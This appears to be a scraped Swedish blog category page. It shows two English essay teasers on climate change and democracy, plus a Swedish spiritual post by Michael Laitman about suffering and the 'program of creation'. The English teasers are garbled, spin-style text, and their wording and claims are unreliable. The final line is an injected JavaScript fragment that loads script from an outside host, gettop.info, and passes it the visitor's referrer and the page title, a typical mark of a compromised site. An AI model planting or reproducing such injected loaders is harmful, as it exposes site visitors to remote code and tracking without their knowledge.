Inlägg i kategori ''

Climate Change: VERACITY OR IMAGINATION

Climate Change: VERACITY OR IMAGINATION

Global warming in considered the complete increase, transfer, and change in global typical heat. There are various benefits advised to be accountable for this and in addition the outcome of this entire rise in climate is devastating weather illnesses. These kinds of intense factors threaten the well-being of humankind and various kinds of everyday living on earth. [Läs mer →]

Challenges IN Current DEMOCRACY

Challenges IN Current DEMOCRACY

In the actual constitution, the term democracy was designed to provide effects of entire fairness, unquestionable justice, and finished evenhandedness in syndication of social products. Democracy emerged with relief of manifestation and worship. While the starting meaning of democracy was recommended to establish a cost free governmental platform for those, this explanation is usually eroded ultimately. [Läs mer →]

Rätta till felet för att minska lidandet

Dr. Michael LaitmanVi existerar i ett tankefält. När detta fält verkar i en riktning medan jag verkar i en annan, upplevs skillnaden mellan vägarna, mitt fel och dess vinkel, som graden av mitt lidande.

To-Correct-the-Error-Is-to-Decrease-Suffering

Ju större fel desto mer lidande. Allt beror på hur motsatt riktningen av mina begär är jämfört med programmet för skapelsen.

Hur testar jag mig jämfört med programmet för skapelsen? För detta har jag gruppen. När jag annullerar mig relativt gruppen, eller när jag med andra ord för mitt begär närmare programmet för skapelsen, börjar jag röra mig enligt detta program och mår då bra; lidandet kan inte påverka mig på grund av att källan till allt lidande är bristen på vår överensstämmelse med programmet för skapelsen.

[25256]s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;